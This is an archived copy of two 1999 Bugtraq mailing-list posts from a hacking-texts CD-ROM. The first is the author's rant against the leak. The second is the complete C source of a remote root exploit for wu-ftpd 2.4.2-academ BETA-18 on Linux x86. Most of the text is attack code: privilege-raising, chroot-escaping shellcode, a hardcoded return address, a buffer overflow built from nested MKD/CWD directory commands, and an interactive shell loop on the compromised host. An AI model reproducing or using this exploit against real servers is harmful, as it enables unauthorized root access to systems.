home *** CD-ROM | disk | FTP | other *** search
/ Hacker's Arsenal - The Cutting Edge of Hacking / Hacker's Arsenal - The Cutting Edge of Hacking.iso / texts / misc / wu-ftpd-beta18-root.txt < prev    next >
Encoding:
Text File  |  2001-07-11  |  8.8 KB  |  312 lines
  1. ate: Tue, 23 Mar 1999 09:09:11 +0000
  2. From: duke <duke@VIPER.NET.AU>
  3. To: BUGTRAQ@netspace.org
  4. Subject: Re: ftp exploit
  5.  
  6. hi,
  7.  
  8. this code i wrote demonstrated a vulnerability that is already widely known, and as indicated in the comments is
  9. (was) private... there is nothing to be gained from posting this here and furthermore you have *NO* right to post
  10. code not written by you, and not given to you by the author, but by some third rate source. All posting it here does
  11. is put alot more servers at an unecessary risk.
  12.  Maybe next time you should see if its ok with the author before giving it out.
  13.  
  14. (sorry about the rant aleph1, others..)
  15. -duke
  16.  
  17. ---------------------------------------------------------------------------------------------
  18.  
  19. Date: Mon, 22 Mar 1999 17:10:23 +0100
  20. From: Pieter Nieuwenhuijsen <pietern@XS4ALL.NL>
  21. To: BUGTRAQ@netspace.org
  22. Subject: ftp exploit
  23.  
  24. /*
  25.         THIS IS PRIVATE! DO NOT DISTRIBUTE!!!!   PRIVATE!
  26.  
  27.         WU-FTPD REMOTE EXPLOIT Version wu-2.4.2-academ[BETA-18](1)
  28.         for linux x86 (redhat 5.2)
  29.  
  30.         by duke
  31.         duke@viper.net.au
  32.  
  33.         BIG thanks to stran9er for alot of help with part of the shellcode!
  34.         i fear stran9er, but who doesn't? !@$ :)
  35.  
  36.         Greets to: #!ADM, el8.org users,
  37.  
  38.         To exploit this remotely they need to have a directory you can
  39.         have write privlidges to.. this is the <dir> argument.. you can
  40.         also use this locally by specifying -l <ur login> -p <urpass> with the
  41.         <dir> = your home directory or something..(must begin with '/')
  42.         also alignment arg is how return address  is aligned.. shouldnt need it,
  43.         but if u do it should be between 0 and 3
  44.  
  45.         It takes about 10 seconds after "logged in" so be patient.
  46.         -duke
  47. */
  48.  
  49. #include <stdio.h>
  50. #include <string.h>
  51. #include <netdb.h>
  52. #include <netinet/in.h>
  53. #include <sys/socket.h>
  54. #include <sys/types.h>
  55. //#include <linux/time.h>
  56. //#include <sys/select.h>
  57. #include <sys/time.h>
  58. #include <unistd.h>
  59.  
  60. #define RET 0xbfffa80f
  61.  
  62. void logintoftp();
  63. void sh();
  64. void mkd(char *);
  65. int max(int, int);
  66. long getip(char *name);
  67.  
  68. char shellcode[] =
  69. "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x31\xc0\xb0\x17\xcd\x80"
  70. "\x31\xc0\x31\xdb\xb0\x2e\xcd\x80"
  71. "\xeb\x4f\x31\xc0\x31\xc9\x5e\xb0\x27\x8d\x5e\x05\xfe\xc5\xb1\xed"
  72. "\xcd\x80\x31\xc0\x8d\x5e\x05\xb0\x3d\xcd\x80\x31\xc0\xbb\xd2\xd1"
  73. "\xd0\xff\xf7\xdb\x31\xc9\xb1\x10\x56\x01\xce\x89\x1e\x83\xc6\x03"
  74. "\xe0\xf9\x5e\xb0\x3d\x8d\x5e\x10\xcd\x80\x31\xc0\x88\x46\x07\x89"
  75. "\x76\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd"
  76. "\x80\xe8\xac\xff\xff\xff";
  77.  
  78. char tmp[256];
  79. char name[128], pass[128];
  80.  
  81. int sockfd;
  82.  
  83. int main(int argc, char **argv)
  84. {
  85.         char sendln[1024], recvln[4048], buf1[800], buf2[1000];
  86.         char *p, *q, arg, **fakeargv = (char **) malloc(sizeof(char *)*(argc + 1));
  87.         int len, offset = 0, i, align=0;
  88.         struct sockaddr_in cli;
  89.  
  90.         if(argc < 3){
  91.                 printf("usage: %s <host> <dir> [-l name] [-p pass] [-a <alignment>] [-o offset]\n", argv[0]);
  92.                 exit(0);
  93.         }
  94.  
  95.         for(i=0; i < argc; i++) {
  96.           fakeargv[i] = (char *)malloc(strlen(argv[i]) + 1);
  97.           strncpy(fakeargv[i], argv[i], strlen(argv[i]) + 1);
  98.         }
  99.  
  100.         fakeargv[argc] = NULL;
  101.  
  102.  
  103.         while((arg = getopt(argc,fakeargv,"l:p:a:o:")) != EOF){
  104.             switch(arg) {
  105.                   case 'l':
  106.                      strncpy(name,optarg,128);
  107.                      break;
  108.                   case 'p':
  109.                      strncpy(pass,optarg,128);
  110.                      break;
  111.                   case 'a':
  112.                      align=atoi(optarg);
  113.                      break;
  114.                   case 'o':
  115.                      offset=atoi(optarg);
  116.                      break;
  117.                   default:
  118.                      printf("usage: %s <host> <dir> [-l name] [-p pass] [-a <alignment>] [-o offset]\n", argv[0]);
  119.                      exit(0);
  120.                      break;
  121.              }
  122.         }
  123.  
  124.         if(name[0] == 0) strcpy(name, "anonymous");
  125.         if(pass[0] == 0) strcpy(pass, "hi@blahblah.net");
  126.  
  127.  
  128.         bzero(&cli, sizeof(cli));
  129.         bzero(recvln, sizeof(recvln));
  130.         bzero(sendln, sizeof(sendln));
  131.         cli.sin_family = AF_INET;
  132.         cli.sin_port = htons(21);
  133.         cli.sin_addr.s_addr=getip(argv[1]);
  134.  
  135.         if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){
  136.                 perror("socket");
  137.                 exit(0);
  138.         }
  139.  
  140.         if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0){
  141.                 perror("connect");
  142.                 exit(0);
  143.         }
  144.         while((len = read(sockfd, recvln, sizeof(recvln))) > 0){
  145.                 recvln[len] = '\0';
  146.                 if(strchr(recvln, '\n') != NULL)
  147.                         break;
  148.         }
  149.         logintoftp(sockfd);
  150.         printf("logged in.\n");
  151.         bzero(sendln, sizeof(sendln));
  152.  
  153.         for(i=align; i<996; i+=4)
  154.                 *(long *)&buf2[i] = RET + offset;
  155.         memcpy(buf2, "a", align);
  156.         memset(buf1, 0x90, 800);
  157.         memcpy(buf1, argv[2], strlen(argv[2]));
  158.         mkd(argv[2]);
  159.         p = &buf1[strlen(argv[2])];
  160.         q = &buf1[799];
  161.         *q = '\x0';
  162.         while(p <= q){
  163.                 strncpy(tmp, p, 200);
  164.                 mkd(tmp);
  165.                 p+=200;
  166.         }
  167.         mkd(shellcode);
  168.         mkd("bin");
  169.         mkd("sh");
  170.         p = &buf2[0];
  171.         q = &buf2[999];
  172.         while(p <= q){
  173.                 strncpy(tmp, p, 250);
  174.                 mkd(tmp);
  175.                 p+=250;
  176.         }
  177.         sh(sockfd);
  178.  
  179.  
  180.         close(sockfd);
  181.         printf("finit.\n");
  182. }
  183.  
  184. void mkd(char *dir)
  185. {
  186.         char snd[512], rcv[1024];
  187.         char blah[1024], *p;
  188.         int n;
  189.         struct timeval tv;
  190.  
  191.         fd_set fds;
  192.         bzero(&tv, sizeof(tv));
  193.         tv.tv_usec=50;
  194.         bzero(blah, sizeof(blah));
  195.         p = blah;
  196.          for(n=0; n<strlen(dir); n++){
  197.                 if(dir[n] == '\xff'){
  198.                         *p = '\xff';
  199.                         p++;
  200.                 }
  201.                 *p = dir[n];
  202.                 p++;
  203.         }
  204.         sprintf(snd, "MKD %s\r\n", blah);
  205.         write(sockfd, snd, strlen(snd));
  206.         bzero(snd, sizeof(snd));
  207.         sprintf(snd, "CWD %s\r\n", blah);
  208.         write(sockfd, snd, strlen(snd));
  209.         bzero(rcv, sizeof(rcv));
  210.  
  211.         FD_ZERO(&fds);
  212.         FD_SET(sockfd,&fds);
  213.         select(sockfd+1,&fds,NULL,NULL,&tv);
  214.  
  215.         if (FD_ISSET(sockfd,&fds))
  216.                 while((n = read(sockfd, rcv, sizeof(rcv))) > 0){
  217.                         rcv[n] = 0;
  218.                         if(strchr(rcv, '\n') != NULL)
  219.                                 break;
  220.                 }
  221.         return;
  222. }
  223.  
  224. void logintoftp()
  225. {
  226.         char snd[1024], rcv[1024];
  227.         int n;
  228.  
  229.         printf("logging in with %s: %s\n", name, pass);
  230.         memset(snd, '\0', 1024);
  231.         sprintf(snd, "USER %s\r\n", name);
  232.         write(sockfd, snd, strlen(snd));
  233.  
  234.         while((n=read(sockfd, rcv, sizeof(rcv))) > 0){
  235.                 rcv[n] = 0;
  236.                 if(strchr(rcv, '\n') != NULL)
  237.                         break;
  238.         }
  239.  
  240.         memset(snd, '\0', 1024);
  241.         sprintf(snd, "PASS %s\r\n", pass);
  242.         write(sockfd, snd, strlen(snd));
  243.  
  244.         while((n=read(sockfd, rcv, sizeof(rcv))) > 0){
  245.                 rcv[n] = 0;
  246.                 if(strchr(rcv, '\n') != NULL)
  247.                         break;
  248.         }
  249.         return;
  250. }
  251.  
  252. void sh()
  253. {
  254.         char snd[1024], rcv[1024];
  255.         fd_set rset;
  256.         int maxfd, n;
  257.  
  258.         strcpy(snd, "cd /; uname -a; pwd; id;\n");
  259.         write(sockfd, snd, strlen(snd));
  260.  
  261.         for(;;){
  262.                 FD_SET(fileno(stdin), &rset);
  263.                 FD_SET(sockfd, &rset);
  264.                 maxfd = max(fileno(stdin), sockfd) + 1;
  265.                 select(maxfd, &rset, NULL, NULL, NULL);
  266.                 if(FD_ISSET(fileno(stdin), &rset)){
  267.                         bzero(snd, sizeof(snd));
  268.                         fgets(snd, sizeof(snd)-2, stdin);
  269.                         write(sockfd, snd, strlen(snd));
  270.                 }
  271.                 if(FD_ISSET(sockfd, &rset)){
  272.                         bzero(rcv, sizeof(rcv));
  273.                         if((n = read(sockfd, rcv, sizeof(rcv))) == 0){
  274.                                 printf("EOF.\n");
  275.                                 exit(0);
  276.                         }
  277.                         if(n < 0){
  278.                                 perror("read");
  279.                                 exit(-1);
  280.                         }
  281.                         fputs(rcv, stdout);
  282.                 }
  283.         }
  284. }
  285.  
  286. int max(int x, int y)
  287. {
  288.         if(x > y)
  289.                 return(x);
  290.         return(y);
  291. }
  292.  
  293. long getip(char *name)
  294. {
  295.         struct hostent *hp;
  296.         long ip;
  297.  
  298.         if ((ip=inet_addr(name))==-1)
  299.         {
  300.                 if ((hp=gethostbyname(name))==NULL)
  301.                 {
  302.                         fprintf(stderr,"Can't resolve host.\n");
  303.                         exit (1);
  304.                 }
  305.                 memcpy(&ip, (hp->h_addr), 4);
  306.         }
  307.         return ip;
  308. }
  309.  
  310.  
  311.  
  312.